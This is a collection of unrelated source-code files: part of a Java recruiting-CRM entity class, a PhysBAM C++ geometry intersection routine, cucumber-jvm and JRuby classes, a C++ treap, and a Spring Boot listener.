result = 31 * result + (parentClientCorporation != null ? parentClientCorporation.hashCode() : 0);
result = 31 * result + (phone != null ? phone.hashCode() : 0);
result = 31 * result + (revenue != null ? revenue.hashCode() : 0);
result = 31 * result + (status != null ? status.hashCode() : 0);
result = 31 * result + (taxRate != null ? taxRate.hashCode() : 0);
result = 31 * result + (tickerSymbol != null ? tickerSymbol.hashCode() : 0);
result = 31 * result + (trackTitle != null ? trackTitle.hashCode() : 0);
result = 31 * result + (workWeekStart != null ? workWeekStart.hashCode() : 0);
result = 31 * result + (requirements != null ? requirements.hashCode() : 0);
result = 31 * result + (certificationGroups != null ? certificationGroups.hashCode() : 0);
result = 31 * result + (customObject1s != null ? customObject1s.hashCode() : 0);
result = 31 * result + (customObject2s != null ? customObject2s.hashCode() : 0);
result = 31 * result + (customObject3s != null ? customObject3s.hashCode() : 0);
result = 31 * result + (customObject4s != null ? customObject4s.hashCode() : 0);
result = 31 * result + (customObject5s != null ? customObject5s.hashCode() : 0);
result = 31 * result + (customObject6s != null ? customObject6s.hashCode() : 0);
result = 31 * result + (customObject7s != null ? customObject7s.hashCode() : 0);
result = 31 * result + (customObject8s != null ? customObject8s.hashCode() : 0);
result = 31 * result + (customObject9s != null ? customObject9s.hashCode() : 0);
result = 31 * result + (customObject10s != null ? customObject10s.hashCode() : 0);
result = 31 * result + (customObject11s != null ? customObject11s.hashCode() : 0);
result = 31 * result + (customObject12s != null ? customObject12s.hashCode() : 0);
result = 31 * result + (customObject13s != null ? customObject13s.hashCode() : 0);
result = 31 * result + (customObject14s != null ? customObject14s.hashCode() : 0);
result = 31 * result + (customObject15s != null ? customObject15s.hashCode() : 0);
result = 31 * result + (customObject16s != null ? customObject16s.hashCode() : 0);
result = 31 * result + (customObject17s != null ? customObject17s.hashCode() : 0);
result = 31 * result + (customObject18s != null ? customObject18s.hashCode() : 0);
result = 31 * result + (customObject19s != null ? customObject19s.hashCode() : 0);
result = 31 * result + (customObject20s != null ? customObject20s.hashCode() : 0);
return result;
}
@Override
public String toString() {
final StringBuilder sb = new StringBuilder("ClientCorporation{");
sb.append("id=").append(id);
sb.append(", address=").append(address);
sb.append(", annualRevenue=").append(annualRevenue);
sb.append(", billingAddress=").append(billingAddress);
sb.append(", billingContact='").append(billingContact).append('\'');
sb.append(", billingFrequency='").append(billingFrequency).append('\'');
sb.append(", billingPhone='").append(billingPhone).append('\'');
sb.append(", branch=").append(branch);
sb.append(", businessSectorList='").append(businessSectorList).append('\'');
sb.append(", childClientCorporations=").append(childClientCorporations);
sb.append(", clientContacts=").append(clientContacts);
sb.append(", companyDescription='").append(companyDescription).append('\'');
sb.append(", companyURL='").append(companyURL).append('\'');
sb.append(", competitors='").append(competitors).append('\'');
sb.append(", culture='").append(culture).append('\'');
sb.append(", dateAdded=").append(dateAdded);
sb.append(", dateFounded=").append(dateFounded);
sb.append(", dateLastModified=").append(dateLastModified);
sb.append(", department=").append(department);
sb.append(", externalID='").append(externalID).append('\'');
sb.append(", fax='").append(fax).append('\'');
sb.append(", feeArrangement=").append(feeArrangement);
sb.append(", funding='").append(funding).append('\'');
sb.append(", industryList='").append(industryList).append('\'');
sb.append(", invoiceFormat='").append(invoiceFormat).append('\'');
sb.append(", leads=").append(leads);
sb.append(", linkedinProfileName='").append(linkedinProfileName).append('\'');
sb.append(", name='").append(name).append('\'');
sb.append(", notes='").append(notes).append('\'');
sb.append(", numEmployees=").append(numEmployees);
sb.append(", numOffices=").append(numOffices);
sb.append(", ownership='").append(ownership).append('\'');
sb.append(", owners=").append(owners);
sb.append(", parentClientCorporation=").append(parentClientCorporation);
sb.append(", phone='").append(phone).append('\'');
sb.append(", revenue='").append(revenue).append('\'');
sb.append(", status='").append(status).append('\'');
sb.append(", taxRate=").append(taxRate);
sb.append(", tickerSymbol='").append(tickerSymbol).append('\'');
sb.append(", trackTitle='").append(trackTitle).append('\'');
sb.append(", workWeekStart=").append(workWeekStart);
sb.append(", requirements=").append(requirements);
sb.append(", certificationGroups=").append(certificationGroups);
sb.append(", customObject1s=").append(customObject1s);
sb.append(", customObject2s=").append(customObject2s);
sb.append(", customObject3s=").append(customObject3s);
sb.append(", customObject4s=").append(customObject4s);
sb.append(", customObject5s=").append(customObject5s);
sb.append(", customObject6s=").append(customObject6s);
sb.append(", customObject7s=").append(customObject7s);
sb.append(", customObject8s=").append(customObject8s);
sb.append(", customObject9s=").append(customObject9s);
sb.append(", customObject10s=").append(customObject10s);
sb.append(", customObject11s=").append(customObject11s);
sb.append(", customObject12s=").append(customObject12s);
sb.append(", customObject13s=").append(customObject13s);
sb.append(", customObject14s=").append(customObject14s);
sb.append(", customObject15s=").append(customObject15s);
sb.append(", customObject16s=").append(customObject16s);
sb.append(", customObject17s=").append(customObject17s);
sb.append(", customObject18s=").append(customObject18s);
sb.append(", customObject19s=").append(customObject19s);
sb.append(", customObject20s=").append(customObject20s);
sb.append('}');
return sb.toString();
}
public ClientCorporation instantiateForInsert() {
ClientCorporation entity = new ClientCorporation();
entity.setAddress(new Address().instantiateForInsert());
entity.setAnnualRevenue(new BigDecimal(10000.00));
entity.setFeeArrangement(new BigDecimal(100.00));
entity.setName("<NAME>");
entity.setNumEmployees(500);
entity.setNumOffices(1);
entity.setStatus("Active");
return entity;
}
}
|
//#####################################################################
// Copyright 2009, <NAME>.
// This file is part of PhysBAM whose distribution is governed by the license contained in the accompanying file PHYSBAM_COPYRIGHT.txt.
//#####################################################################
// Namespace INTERSECTION
//#####################################################################
#include <PhysBAM_Tools/Math_Tools/RANGE.h>
#include <PhysBAM_Geometry/Basic_Geometry/POINT_SIMPLEX_1D.h>
#include <PhysBAM_Geometry/Basic_Geometry_Intersections/BOX_POINT_SIMPLEX_1D_INTERSECTION.h>
namespace PhysBAM{
namespace INTERSECTION{
//#####################################################################
// Function Intersects
//#####################################################################
template<class T> bool Intersects(const RANGE<VECTOR<T,1> >& box,const POINT_SIMPLEX_1D<T>& point,const T thickness_over_two)
{
return !box.Outside(point.x1,thickness_over_two);
}
//#####################################################################
// Function Halfspace_Intersection_Size
//#####################################################################
template<class T> T Halfspace_Intersection_Size(const RANGE<VECTOR<T,1> >& box,const POINT_SIMPLEX_1D<T>& halfspace,VECTOR<T,1>* centroid)
{
PHYSBAM_NOT_IMPLEMENTED();
}
//#####################################################################
template bool Intersects(const RANGE<VECTOR<float,1> >&,const POINT_SIMPLEX_1D<float>&,const float);
template float Halfspace_Intersection_Size(const RANGE<VECTOR<float,1> >&,const POINT_SIMPLEX_1D<float>&,VECTOR<float,1>*);
#ifndef COMPILE_WITHOUT_DOUBLE_SUPPORT
template bool Intersects(const RANGE<VECTOR<double,1> >&,const POINT_SIMPLEX_1D<double>&,const double);
template double Halfspace_Intersection_Size(const RANGE<VECTOR<double,1> >&,const POINT_SIMPLEX_1D<double>&,VECTOR<double,1>*);
#endif
};
};
|
<reponame>fabien7474/cucumber-jvm
package cucumber.runtime.model;
import gherkin.formatter.Formatter;
import gherkin.formatter.model.Examples;
import gherkin.formatter.model.ExamplesTableRow;
import gherkin.formatter.model.Tag;
import java.util.ArrayList;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
public class CucumberExamples {
private final CucumberScenarioOutline cucumberScenarioOutline;
private final Examples examples;
public CucumberExamples(CucumberScenarioOutline cucumberScenarioOutline, Examples examples) {
this.cucumberScenarioOutline = cucumberScenarioOutline;
this.examples = examples;
}
public List<CucumberScenario> createExampleScenarios() {
List<CucumberScenario> exampleScenarios = new ArrayList<CucumberScenario>();
List<ExamplesTableRow> rows = examples.getRows();
List<Tag> tags = new ArrayList<Tag>(tagsAndInheritedTags());
for (int i = 1; i < rows.size(); i++) {
exampleScenarios.add(cucumberScenarioOutline.createExampleScenario(rows.get(0), rows.get(i), tags, examples.getDescription()));
}
return exampleScenarios;
}
private Set<Tag> tagsAndInheritedTags() {
Set<Tag> tags = new HashSet<Tag>();
tags.addAll(cucumberScenarioOutline.tagsAndInheritedTags());
tags.addAll(examples.getTags());
return tags;
}
public Examples getExamples() {
return examples;
}
public void format(Formatter formatter) {
examples.replay(formatter);
}
}
|
/* The key of each element is the array index of the element.
* Time: O(log N)
* Memory: O(N)
*/
#include <bits/stdc++.h>
using namespace std;
struct Treap {
struct Node {
int val, p, sz;
Node *left, *right;
Node(int val) : val(val), p(randomPriority()), sz(1), left(nullptr), right(nullptr) {}
};
static int randomPriority() {
return rand() * 65536 + rand();
}
static int getSize(Node *u) {
return u == nullptr ? 0 : u->sz;
}
static void update(Node *u) {
if (u)
u->sz = 1 + getSize(u->left) + getSize(u->right);
}
Node *root;
Treap() : root(nullptr) {}
// precondition: all values of u are smaller than all values of v
static Node *join(Node *u, Node *v) {
if (u == nullptr)
return v;
if (v == nullptr)
return u;
if (u->p > v->p) {
u->right = join(u->right, v);
update(u);
return u;
}
v->left = join(u, v->left);
update(v);
return v;
}
static pair<Node *, Node *> split(Node *u, int k) {
if (u == nullptr)
return make_pair(nullptr, nullptr);
if (getSize(u->left) + 1 > k) {
auto res = split(u->left, k);
u->left = res.second;
res.second = u;
update(res.first);
update(res.second);
return res;
} else {
auto res = split(u->right, k - getSize(u->left) - 1);
u->right = res.first;
res.first = u;
update(res.first);
update(res.second);
return res;
}
}
void modify(int index, int val) {
Node *curr = root;
while (curr != nullptr) {
if (getSize(curr->left) + 1 < index)
index -= getSize(curr->left) + 1, curr = curr->right;
else if (getSize(curr->left) + 1 > index)
curr = curr->left;
else {
curr->val = val;
return;
}
}
}
int get(int index) {
Node *curr = root;
while (curr != nullptr) {
if (getSize(curr->left) + 1 < index)
index -= getSize(curr->left) + 1, curr = curr->right;
else if (getSize(curr->left) + 1 > index)
curr = curr->left;
else
return curr->val;
}
return -1;
}
void push_back(int val) {
root = join(root, new Node(val));
}
void insert(int index, int val) {
auto res = split(root, index);
root = join(res.first, join(new Node(val), res.second));
}
void remove(int index) {
auto nodes = split(root, index);
root = join(nodes.first->left, join(nodes.first->right, nodes.second));
}
};
|
package io.leopard.boot;
import org.springframework.boot.context.event.ApplicationEnvironmentPreparedEvent;
import org.springframework.context.ApplicationEvent;
import org.springframework.context.ApplicationListener;
import org.springframework.core.Ordered;
import org.springframework.core.annotation.Order;
@Order(Ordered.LOWEST_PRECEDENCE - 1000) // 保证在ConfigFileApplicationListener后面初始化
public class LeopardApplicationListener implements ApplicationListener<ApplicationEvent> {
private static String basePackages;
@Override
public void onApplicationEvent(ApplicationEvent event) {
// System.err.println("LeopardApplicationListener onApplicationEvent");
if (event instanceof ApplicationEnvironmentPreparedEvent) {
onApplicationEnvironmentPreparedEvent((ApplicationEnvironmentPreparedEvent) event);
}
}
private void onApplicationEnvironmentPreparedEvent(ApplicationEnvironmentPreparedEvent event) {
basePackages = event.getEnvironment().getProperty("app.basePackages");
// System.exit(0);
// EnvironmentPostProcessor postProcessor = null;
// postProcessor.postProcessEnvironment(event.getEnvironment(), event.getSpringApplication());
}
public static String getBasePackages() {
return basePackages;
}
}
|
package org.jruby.ir.instructions;
import org.jruby.ir.IRVisitor;
import org.jruby.ir.Operation;
import org.jruby.ir.instructions.specialized.OneOperandArgNoBlockNoResultCallInstr;
import org.jruby.ir.operands.Operand;
import org.jruby.ir.transformations.inlining.CloneInfo;
import org.jruby.runtime.CallType;
public class NoResultCallInstr extends CallBase {
// FIXME: Removed results undoes specialized callinstrs. Audit how often and what and make equalivalent versions here.
public static NoResultCallInstr create(CallType callType, String name, Operand receiver, Operand[] args, Operand closure) {
if (closure == null && !containsArgSplat(args) && args.length == 1) {
return new OneOperandArgNoBlockNoResultCallInstr(callType, name, receiver, args, null);
}
return new NoResultCallInstr(Operation.NORESULT_CALL, callType, name, receiver, args, closure);
}
public NoResultCallInstr(Operation op, CallType callType, String name, Operand receiver, Operand[] args, Operand closure) {
super(op, callType, name, receiver, args, closure);
}
@Override
public Instr clone(CloneInfo ii) {
return new NoResultCallInstr(getOperation(), getCallType(), getName(), getReceiver().cloneForInlining(ii),
cloneCallArgs(ii), getClosureArg() == null ? null : getClosureArg().cloneForInlining(ii));
}
@Override
public void visit(IRVisitor visitor) {
visitor.NoResultCallInstr(this);
}
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.